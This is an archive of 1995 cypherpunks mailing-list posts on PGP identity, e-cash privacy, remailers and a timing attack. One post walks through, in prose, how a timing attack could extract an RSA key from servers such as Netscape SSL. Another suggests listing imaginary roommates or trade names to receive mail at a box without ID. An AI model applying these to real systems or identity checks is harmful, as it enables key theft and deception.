abstain from associating Seb's key <0xCC56B2E9> in her mind
with my housemate?


> If we stick to a lesser goal -- constancy of identity -- 
> this is not so hard.  In general it is impossible to prove that 
> Bryce is the "real" Bryce, but it is trivial to prove that 
> Bryce is the same Bryce who has a certain Web page, and the
> same Bryce who posted a certain article in archives.


But if I am the victim of a successful active attack then you
are *not* certain that I am the same Bryce.  The Bryce who
posted a certain article in the archives might be completely
different from (and antagonistic toward!) the Bryce who later
contacts you in e-mail using the same public key.  Do you see
why?


> We should blow off this attempt to do the impossible.


It is far from impossible.  In fact, it is easy if we pay
attention and cooperate.  


Note that I am in complete agreement with you about the (non-)
value of "True" identities.  In the above example I do not 
expect you to care which Bryce is the "real" Bryce, but I *do* 
expect you to care that the two Bryces are different.


In short, the Web O Trust is important to maintain constancy
of identity.  It is not trivial, but neither is it impossible,
to do so.


Regards,

Bryce, a unique and autonomous entity


signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMM855vWZSllhfG25AQG8JQP+Ikc9sfUdEQHhLTM1/cTlimFBKB/ppifD
N58Eh6e6UboOeoatcLdHgEEkrewhYkVD+AcIoV5CUHLt22Q88vjH2Fq9jJ+tV3CO
65r9kyVeIg49qQZHx0FrSTytoTrY3Zg9RdJoh4zT/Vy36dCcwgRcfAzkPdMBfQqU
W9mViQbS5w0=
=KyrB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jas (Matthew K) <matt@lordmuck.itd.uts.edu.au>
Date: Wed, 13 Dec 1995 13:45:07 +0800
To: cypherpunks@toad.com
Subject: Using quantum cryptography to effect covert channels
Message-ID: <199512130321.OAA12208@lordmuck.itd.uts.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


B2,3 and A1 system (Orange book), use covert channel analysis to
prevent leakages of information (intentional or otherwise). This forms
a part of enforcing MAC on such systems. well recently i thought of a
method to overcome these barriers so covert channels can again be used
to transmit and receive from such machines. this method involves using
quantum cryptography.

"randomization" is one method used to prevent covert channels, however
it is this "randomization" that can be used with quantum crypto to not
only make covert channels, but also makes the covert channels secure
as well as authenticated!

basically quantum crypto uses the fact that observing a system
modifies the system. this works on machines that use "randomization"
as a method of detering covert channels. ObExample, if an admin gets
suspicious of certain behaviour on a machine, the machine behaves
differently if he tries to investigate it (as a result of "poking
around" the machine to see what is going on).

this can be used with quatum crypto methods to covertly communicate
data (with security and authentification), and if someone attempts to
"observe" the behaviour on the said machines, it will break the
communication (because the machine behaviour changes, hence breaks the
message) rendering the message unreadable. this may slow down
communication some, and will need self-synchronization of some sort,
but at least you can communicate.

this idea is very rough however, and there may be gaping holes in my
arguments, but i think it might be an area someone may wish to look
into (especially the high assurance types). i really should write a
draft paper on this, but i dont really have a good enough
understanding of the formal methods to pull it off. however i have got
a coining name for this method, "covert quantum channels".

just a random thought to throw around...

			Matt
-- 
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan   Systems Programmer   Information Technology Division
      University of Technology     Sydney Australia

It's nice to be in a position where people apologize because they
assume there's humor in your work, based on past experience,
but they're not sure where it is. -- Rob Pike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 14 Dec 1995 08:18:11 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: PGP/PINE integration
In-Reply-To: <Pine.ULT.3.91.951213014345.22977C-100000@krypton.mankato.msus.edu>
Message-ID: <199512132126.OAA17578@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Robert Hayden <hayden@krypton.mankato.msus.edu>
>
> For those that dont' need quite this much or don't have access to pine at 
> the install level (often for university systems with a central software 
> depository), I have a script called PineSign available on my home page 
> (or email me) that will allow simple PGP singing of your pine mailings 
> and postings.  I doesn't do encryption, but works great for signatures.


And my "Bryce's Easy PGP" script, whose creation was inspired
by Mr. Hayden's PineSign, does both encryption and
signing, and supports decryption (ugly but usable with Pine).
BAP is an sh script, so it useful with many Unix message
utilities.  I myself use it for all my messages with mh and
trn.


You can buy BAP for 2 US $, payable in Mark Twain Ecash, at my 
WWW site, <a href="http://www.c2.org/~bryce/Niche.html"> 
the Niche </a>, or if you are one of those backwards blokes who 
doesn't have Ecash yet, e-mail me and I'll give you a 
complimentary copy.


Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMM9E7/WZSllhfG25AQHjygP6A0vl0CJyxE8gtEJSH/akRYDyoStCiic4
adZPJTi43bZ0NoZdzYWzNWq3+cJzyvzUIjnj8AynohET61w6czO7ItRtDRuUPuKG
fJEoZh8U65UyZwcIISTVAg10yxoEnF6BjkP9dUGshe/XMt1ydEtgEwj/l2DciZ+K
v6ibPETpfbg=
=VygP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Thu, 14 Dec 1995 06:39:10 +0800
Subject: Re[2]: e-Cash: CAFE vs. Mondex
Message-ID: <9511138188.AA818893347@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     >Matthias Schunter Said
     
     [snip]
     
     >The CAFE system is a cheque based system. This means that the 
     >customer receives an electronic chequebook, where each cheque is 
     >(blindly) signed by the bank. >During each payment the customer has 
     >to use one of these signed cheques.
     
     [snip]
     
     If the CAFE card contains cheques (which are not digital cash, and 
     therefore must be tied back to a customer's checking account), how can 
     the bank blindly sign them?  The merchant will have to deposit the 
     cheque in order to transfer the money out of the customer's account and 
     into the merchant's account.  I don't see how the bank can not know the 
     identity of the customer.
     
     This is why digital cash can be anonymous - because once the bank 
     (blindly) signs the cash tokens, these tokens ARE money.  They are not 
     pointers (in the case of cheques) to customers' bank accounts.
     
     However, if Alice (the customer) contacts her bank and requests a 
     cheque be made out to Bob (the vendor) for, say, $12.50 then the bank 
     can withdraw $12.50 from Alice's account and blindly sign a cheque for 
     $12.50 payable only to Bob.  Then the bank would not know Alice's 
     identity.  I don't think this is how CAFE works, since CAFE is 
     designed as an off-line smart card system.  Therefore, Alice cannot 
     requests bank cheques from her bank made payable to Bob when she walks 
     into Bob's store.
     
     Maybe your definition of a cheque is different than mine?
______________________________ Reply Separator _________________________________
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 14 Dec 1995 08:19:42 +0800
To: cypherpunks@toad.com
Subject: Attacking Clipper with timing info?
Message-ID: <9512132111.AA18490@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Could this timing attack be used to obtain the various keys used by  
Clipper devices?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 14 Dec 1995 08:22:03 +0800
To: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Subject: [NOISE] Re: And the standard continues to lower...
In-Reply-To: <199512132152.QAA23054@bb.hks.net>
Message-ID: <Pine.ULT.3.91.951213150858.29781A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, The user formerly known as Leslie Todd Masco wrote:

> If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that
> I was e-mailed.
> 
> And the chair of a CS department, no less.

I don't believe you'll find that particular college in US News & World 
Report.
 
> - ------- start of forwarded message (RFC 934 encapsulation) -------
> Subject: Secure No-overhead Online Order System for Publishers
> Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)
> 
> A secure no-overhead online title-ordering system is now available. It may
> be viewed in operation at the home page for Blue Water Publishing, a
> publisher, software developer and distribution company, at 
> http://www.bluewaterp.com/~bcrissey/
> or from the online bookstore area of ISCNI, the Institute for the Study of
> Contact with Non-Human Intelligence at
> http://www.iscni.com

"Beam me up, Scotty. There's no intelligent life down here."

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM9dmo3DXUbM57SdAQEU5gQAtaJJJ9975vln12JWkCHviXXOC6xIGJo0
gxPeTRha4i7e++G7VrZ9Z2QM2QRIhEDj4c2vBMbCNdCwfyGGmpV/+ykqVMMfppEk
B2doHMizkGLju0gSobE4MOvNQyO6jLavJnpee/QgR7eaHs6iVb7yzhYqcOfRmLeo
BlYK0ACngT0=
=oC/C
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 14 Dec 1995 06:21:16 +0800
To: cypherpunks@toad.com
Subject: OSF security announcement
Message-ID: <951213151725.60204104@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The following is part of an OSF announcement. Most of the marketing
 hype has been deleted, but I thought the security part would be of interest.

                                      Bob
------------------------------------------------------------------
CAMBRIDGE, MA, December 12, 1995  --  The Open Software
Foundation (OSF) today announced the DCE-Web Advanced
Technology Offering (ATO).  The goal of this software
project is to provide all of the essential capabilities
of the distributed computing environment (encryption,
                                           ^^^^^^^^^
--snip---

* Secure Local Proxy - provides secure DCE-Web access
  using standard off-the-shelf browsers. It is possible
  to access DCE-Web using any browser without any
  modification. The Secure Local Proxy functions as
  protocol switch, forwarding proxy requests either as
  standard http or using the secure DCE-Web protocol.

* Secure Gateway - integrates the DCE-Web with other
  secure Web protocols. The Gateway provides secure
  access to the Multi-protocol Server, providing DCE
  authentication based on public key identities. The
  gateway is designed to allow plug-in access for
  multiple public key Web protocols.

--snip--

For more information on this ATO please refer to the
project home page at http://www.osf.org/www/dceweb/.

--snip---
CONTACT:	Jane Smeloff
		Open Software Foundation
		(617) 621-8997
		Email: jane@osf.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 07:30:23 +0800
To: gbroiles@darkwing.uoregon.edu
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"gbroiles@darkwing.uoregon.edu"  "Greg Broiles" 13-DEC-1995 03:40:50.49

>I don't have much faith that the people who are currently doing the DNS
for my domain name (goldenbear.com) are going to do anything about the
current bouncing-messages phenomenon anytime soon, so I'm looking into other
ways to get & send E-mail (e.g., more persistent than this address which
will disappear when I'm done with school in ~ 6 months). I've found a few
services which may be of interest to C-punks because they're useful for
creating/maintaining persistent cyberspace identities with no necessary
connection to a "real name".

[...]

netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
or forwarding for people; they let you sign up for a trial month for free.
They ask for name/address/phone (which could easily be a Mailboxes Etc
address and a voicemail from Mailboxes Etc or whatever) and accept payment
by check or credit card. They'll store incoming email or forward it to
another account. They'll do header rewriting (similar to the anonymous
remailers) so that outgoing mail looks like it came from this address.
--------------------
       There's one problem with this in regards to the "no necessary
connection," and that 's the governmental requirement for mail forwarding. MBE
and any legal other one will want to see at least two forms of ID including one
photo, and have a form that they fill out using that and send to the local
post office. Anyone have a way around this problem?
       -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthias Schunter <schunter@informatik.uni-hildesheim.de>
Date: Thu, 14 Dec 1995 02:23:18 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <v02120d1bacf49fab0a7a@[147.172.54.29]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:46 Uhr 13.12.1995, Adam Shostack wrote:
>Matthias Schunter wrote:
>
>| The CAFE system is a cheque based system. This means that the
>| customer receives an electronic chequebook, where each cheque is
>| (blindly) signed by the bank.  
>| During each payment the customer has to use one of these signed cheques.
>
>|  privacy-protecting
>|    The privacy of the user is protected.
>
>        How do checks protect the privacy of the user?  The bank
>knows who is spending how much with whom for each check.

No. The cheques are certified blindly. 
I.e., the bank does not see them during signing/withdrawal and therefore doe 
not re-recognize them.

However, the bank does know how much money each participant receives or 
spends, but not who's paying whom.


m

% Matthias <Schunter@acm.org> Uni Hildesheim +49(5121)883-788 fax-732






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 14 Dec 1995 06:30:02 +0800
To: jamesd@echeque.com
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
Message-ID: <01HYRK16QTSM8Y4Z3G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com"  "James A. Donald" 13-DEC-1995 03:44:41.99

>If we stick to a lesser goal -- constancy of identity -- 
this is not so hard.  In general it is impossible to prove that 
Bryce is the "real" Bryce, but it is trivial to prove that 
Bryce is the same Bryce who has a certain Web page, and the
same Bryce who posted a certain article in archives.
-----------------
        I have been considering all the pieces of information that ought to
be automatically linkable to a particular public key. They include:

1. Email address(es) from which mail signed with it is customarily received,
to save on lookup time.

2. Web pages put up by this person.

3. Web pages/ftp files/etcetera authored by this person (i.e., the hks archives
of cypherpunks).

4. Phone number if using a crypto-capable phone with a key-download capacity
from a computer.

5. A declared name or alias.

6. In my files, whatever name I want to give the person.

Ultimately, if I receive something signed by somebody, I would want to have
hypertext links from that file to all of these- to remind me of whom I'm
talking to and his/her/its/their past behavior.
      -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Date: Fri, 15 Dec 1995 10:08:49 +0800
To: cypherpunks@toad.com
Subject: And the standard continues to lower...
Message-ID: <199512132152.QAA23054@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that
I was e-mailed.

And the chair of a CS department, no less.

- ------- start of forwarded message (RFC 934 encapsulation) -------
Subject: Secure No-overhead Online Order System for Publishers
Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)

A secure no-overhead online title-ordering system is now available. It may
be viewed in operation at the home page for Blue Water Publishing, a
publisher, software developer and distribution company, at 
http://www.bluewaterp.com/~bcrissey/
or from the online bookstore area of ISCNI, the Institute for the Study of
Contact with Non-Human Intelligence at
http://www.iscni.com

Blue Water's innovative online ordering system is called SimplySafe. It is
a needle-in-the-haystack approach to online security.  It requires no
encryption or secure servers, yet the probability that a dedicated hacker
scanning 100 internet messages a second will intercept a usable credit
card number sent via SimplySafe is less than the probability of picking
our Sun out of the Milky Way.  That is less than 1 in 200 billion.  Safe
enough for most folks.  There are easier ways for a hacker to pick up
credit card numbers than to waste time with SimplySafe transactions.  Try
it out!

SimplySafe currently supports secure online orders from Blue Water
Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI.
Direct inquiries to 
SimpleSafe@aol.com

***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
(503)-434-2426 brianc@linfield.edu
Professionals built the Titanic, amateurs built the Ark...


- ------- end -------
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMM9LGSoZzwIn1bdtAQEtqwGAnH6mMxeUPhVn/js6zJKocvMwKnN5+VHv
95Zwe2qL3cZOycluLA4Qxl20buL8PApy
=VS5o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Francisco Encarnacao" <francis@e-mail.com>
Date: Thu, 14 Dec 1995 10:30:58 +0800
To: cypherpunks@toad.com
Subject: (U)
Message-ID: <9512132200.AA13025@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


                                                                               
SUBSCRIBRE                                                                     
                                                                               
Regards,                                                                       
Francisco Encarnacao - Equipment Maintenance Technician                        
Internet E-mail address:Francis@e-mail.com                                     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 14 Dec 1995 14:02:29 +0800
To: cypherpunks@toad.com
Subject: Timing attack against RSA
Message-ID: <199512140116.RAA22256@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is how I gather the timing attack against RSA decryption would
work.  This is the chosen-ciphertext attack of Paul Kocher's.

You know n, the public modulus; suppose it is 512 bits.  You want to
know p and q, its prime factors.  You know the details of the server's
implementation of RSA.  The server will do a decryption of the RSA
message you send it, and give you some reply shortly after it is
finished.

You are going to send it bogus messages.  Normally, most random
messages will encrypt under RSA to numbers of about 512 bits, but you will
send it ciphertext which is about 256 bits long.  You are going to try
to figure out the value of p.

The server's algorithm is to take the ciphertext c, and first do:

cp = c mod p
cq = c mod q

It will then do two modular exponentiations, mod p and mod q, and do a
few more calculations, then return some result to you.

The attack is to try to choose c to be about the same size as p, with the
assumption being that if c is a bit less than p then c mod p will be fast
since it doesn't have to do anything, while if c is somewhat larger than
p then c mod p will be a little slower, since it will have to at least
subtract p from c.  Paul Kocher has measured this timing difference as 17
microseconds on one particular implementation.

This is not going to be an easy time difference to measure.  In
addition to doing the c mod p step, the algorithm also does all those
other things:  the c mod q, the two RSA calculations, as well as
whatever overhead is involved in the server's operation and the
communication link.  The variations due to the RSA calculations
themselves will have a standard deviation of about 250 microseconds,
based on Paul's numbers (higher than his reported value because two
exponentiations are done, plus some other work).  So this is a minimum
amount of "noise" we must try to see through even if everything else is
instantaneous.  This might be the situation in the case of a hardwware
token which is doing RSA decryptions with a secret key.

The first step will be to try to determine the length of p.  For this
we will send in c values which are around 256 bits long.  We might
start with some 250 bit values and some 260 bit values, hoping that p
is in that range.  We do a whole lot of these, and we take the average
time for them.  If p is between 250 and 260 bits long, then the 260 bit
values should take at least 17 microseconds more time to calculate on
the average than the 250 bit values.

One interesting question is how many samples we would have to take in
order to detect this difference.  One way to consider it is to ask,
given that the samples have a standard deviation of about 250
microseconds, how many samples do we have to take to reliably estimate
the mean within an accuracy of about 10 microseconds, or 1/25 of a
standard deviation?

According to my limited knowledge of statistics, if we want to be right
about 90% or 95% of the time, we need to have sqrt(number-of-samples) *
1/25 be > 3, or number-of-samples should be about 5000.  (Take this
with a large grain of salt!)  So we will have to do some thousands of
samples in order to average out the noise and get our mean this
accurate, with good confidence.

Once we have done these tests, we have determined that p is between our
two values.  Now we can sub-divide the interval and poll with values
which are, say, 255 bits long.  Again, we would have to do enough polls
to determine the true mean time to within about 10 microseconds.

After we repeat this three or four times, we will know the bit length
of p; in effect, we know its first bit.  Now we can continue the
divide and bracket procedure.  Each time, we must poll many times with
c values whose most significant bits are halfway between the two
bracketing values which we know contain p.  Each such sequence of about
5000 polls yields us one more bit of p.

We repeat this about 250 times, and we will have p, from which we can
derive q, and we have broken the RSA key.  So, taking the estimate
above of 5000 or so samples to get a bit of p, we will have to do about
a million tests total to find p.  (BTW, in Paul's implementation it
took about 1/3 second to do a decryption, so you're looking at about
100 days of solid work to do the job.)

This algorithm has some self-correcting features but it is not
completely so.  Suppose p's first bits are actually 1011.  We have
determined that it is between 1000 and 1100, and we want the 3rd bit.
We poll with values which start with 1010, and (since with 90% accuracy
we are wrong 10% of the time) we mistakenly conclude that the mean is
the higher value, hence that p is less than 1010 and must start as
100X.  We continue the procedure, and we will find that our new middle
values are consistently less than p, so we gradually work out our
estimate as 10011111...  Eventually this train of 1's might persuade us
that we may have made a mistake back there, so we would go back and
poll again to try to verify our earlier results.  (Of course, if
another mistake happens during the 1's that will confuse us further...)

Doing the attack across a network will be much more difficult because
there will be a lot more variation in the turnaround time.  This will
have the effect of increasing the standard deviation far above a
quarter millisecond, up by probably at least an order of magnitude if
not two or more.  Now we have to estimate a mean to within not 1/25,
but maybe 1/1000 of a standard deviation, or worse.  This would
increase the total number of samples necessary from a million up to the
level of billions or trillions.

One final note: two cases to which we might want to apply this would be
Netscape's SSL as implemented by its secure servers, and DigiCash's
bank software.  (I know Lucky said that DigiCash is immune to this
attack, but maybe we would want to test it to see.) In either case,
since we are sending a bogus 256 bit value, the data which decrypts
will not be valid.  In the case of SSL we will probably get an error
packet or maybe a broken connection to tell us when it has finished the
decryption.  In the case of DigiCash, it does not need to do anything
with the value it signs other than return it, so we will probably get a
return packet.  However, it is not valid cash.  In order to convince
DigiCash to send us this packet, it has to have deducted something from
our account, at least a penny.  If it takes a billion connections to do
the attack (which I think is an underestimate, corresponding to about a
10 millisecond standard deviation on the timing values), that will cost
10 million dollars.  So you better have pretty deep pockets to think
about mounting this attack in that case.  For SSL, misses don't cost you
anything, so maybe it would be worth trying, if you have a good,
low-latency connection and a server with a light load.  The full attack
would take too long but just determining the length of p would be quite a
coup.

Actually of course you would have to do some more research before
mounting this attack; specifically, you'd want to know more about the
timing of the software so you could estimate the costs of the mod p
operation you are trying to catch.  If the number ends up being much less
than 17 microseconds the attack gets that much harder.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMM961RnMLJtOy9MBAQFBgAH/WQTMSvRySqNXpfnI4kNXUKQPAleV4NUL
ciaDg9VrY8OOJ0cYO8aZ+RnGn+BKp7WFbIkIKFDO3mSE/o9Be2uI7w==
=ijGI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 14 Dec 1995 12:17:17 +0800
To: The user formerly known as Leslie Todd Masco <cactus@hks.net>
Subject: Re: And the standard continues to lower...
Message-ID: <9512132317.AA01174@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
> (503)-434-2426 brianc@linfield.edu
> Professionals built the Titanic, amateurs built the Ark...

However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
Brian L. Crissey say the same thing about his payment system?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 15 Dec 1995 13:55:41 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <9512132329.AA01184@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith writes:
>         There's one problem with this in regards to the "no necessary
>  connection," and that 's the governmental requirement for mail
>  forwarding. MBE and any legal other one will want to see at least
>  two forms of ID including one photo, and have a form that they fill
>  out using that and send to the local post office. Anyone have a
>  way around this problem?

Why does an account provider need a snail-address and phone-number?  Usually  
for billing purposes.  However, this isn't necessary for accounts paid with  
ECash.  I believe C2.org already offers non-dialup access accounts, paid for  
with ECash, that do not require a valid snail-address or phone-number.  I am  
sure that there will be many more to come.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (The user formerly known as Leslie Todd Masco)
Date: Thu, 14 Dec 1995 12:15:29 +0800
To: cypherpunks@toad.com
Subject: Re: IDEA encryption
Message-ID: <199512132337.SAA24071@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.91.951212212447.94B-100000@localhost>,
Mark M. <markm@omni.voicenet.com> wrote:
>> Last thing -- how secure is unix "rm"?  If something is rm'd, is it 
>> really really gone? 
>> 
>
>Not very secure.  I have heard that there is a Linux undelete and there might
>be a similar program for other Unices.  If the hard drive is examined using
>special hardware, data will be recoverable. 

It's not even that secure.  As long as the blocks haven't been written over,
you can extract the information from the raw device driver with 'dd' as
root.
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMM9juyoZzwIn1bdtAQFXZAGA4HlzYVD4ORp5LecGxw16q+ELXZFChIuA
kSHufPYuGQjsVDuQ0Ev4Xkroc3kVfZTQ
=1vxa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 15 Dec 1995 18:16:38 +0800
To: cypherpunks@toad.com
Subject: Re:  OSF security announcement
Message-ID: <9512132353.AA16969@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


There are two or three dce-web folks on this list, so if anyone has questions
after reading the web pages (http://www.osf.org/www/dceweb), drop me a line
or post.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Thu, 14 Dec 1995 10:33:36 +0800
To: cypherpunks@toad.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512132111.AA18490@bilbo.suite.com>
Message-ID: <Pine.LNX.3.91.951213184958.140A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Dec 1995, Jim Miller wrote:

> 
> Could this timing attack be used to obtain the various keys used by  
> Clipper devices?
> 
> Jim_Miller@suite.com
> 
> 

The Clipper chip itself does not use digital signatures and public key
encryption.  It only implements an block cypher.  You were probably talking
about Capstone which does use PK crytpo and digital signatures.  Capstone
uses DSS as the digital signature which is explicitly pointed out in the
summary of the timing attack.  I don't think what algorithm it uses for
key exchange has been releases yet, but it probably is vulnerable.  So
Capstone is indeed vulnerable to timing attacks.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMM9n1bZc+sv5siulAQFiogP/ZoGwK/gJpEyGhfQhHx8MM9pA/BPO36ZK
C/lFiOn1DhisqV+o2uYz8noRInr76fhO2drxCzACq1hCt3EAq9rXTmTDZeQOxHQS
6nT8VE5GJH54TwbTn5yeG2w7FUUDFeOYyu/aGQTIztAaUwJ3vLJSnP6ze50BTXI9
JJeziR8yBqE=
=b6p3
-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 14 Dec 1995 13:39:15 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512140317.TAA06107@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith writes (quoting me):

>>netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage
>>or forwarding for people; they let you sign up for a trial month for free.
>>They ask for name/address/phone (which could easily be a Mailboxes Etc
>>address and a voicemail from Mailboxes Etc or whatever) and accept payment
>>by check or credit card.
>--------------------
>       There's one problem with this in regards to the "no necessary
>connection," and that 's the governmental requirement for mail forwarding.
>MBE and any legal other one will want to see at least two forms of ID
>including one photo, and have a form that they fill out using that and
>send to the local post office. Anyone have a way around this problem?

I spent last summer in San Diego - it took me a couple of weeks to find a
place to stay. The first day I was in town I went to an MBE and signed up
for a box - showed them my Oregon ID and said "I don't have a local phone #
or address because I've been in town only 12 hours. That's what I need you
folks for." They cheerfully wrote down the information from the front of my
drivers' license (which is 5 years out of date) and gave me a box. They also
asked if there would be anyone else who'd be getting mail at my box - I
could have specified a business or some roommates. They didn't need to see
ID for those - so you're free to name some real or imagined
roommates/friends, who might coincidentally sign up for E-mail forwarding.
(Or you can just say that "Greg is my real name but John Doe is my trade
name, I get mail under that name too." "Trade names" aren't so unusual for
people in show business or authors or, I read recently, bill collectors.
Apparently they don't want people calling them up at home hassling them.
Imagine that. :) ) The folks at the San Diego MBE have been cheerfully
forwarding my paper mail back here to Oregon as long as I want to keep
paying the postage (plus some sum that they're adding on that's not big
enough to pay attention to). 

It's not the kind of untraceability I'd rely on vis-a-vis a TLA, but it
ought to be good enough to keep your posts to alt.sex.forbidden from showing
up on your boss' desk via DejaNews, or to allow you to go ahead and piss off
part-time fascists who don't have the energy to chase down the paper trail.
--
"The anchored mind screwed into me by the psycho-    Greg Broiles
lubricious thrust of heaven is the one that thinks   
every temptation, every desire, every inhibition."   greg@goldenbear.com
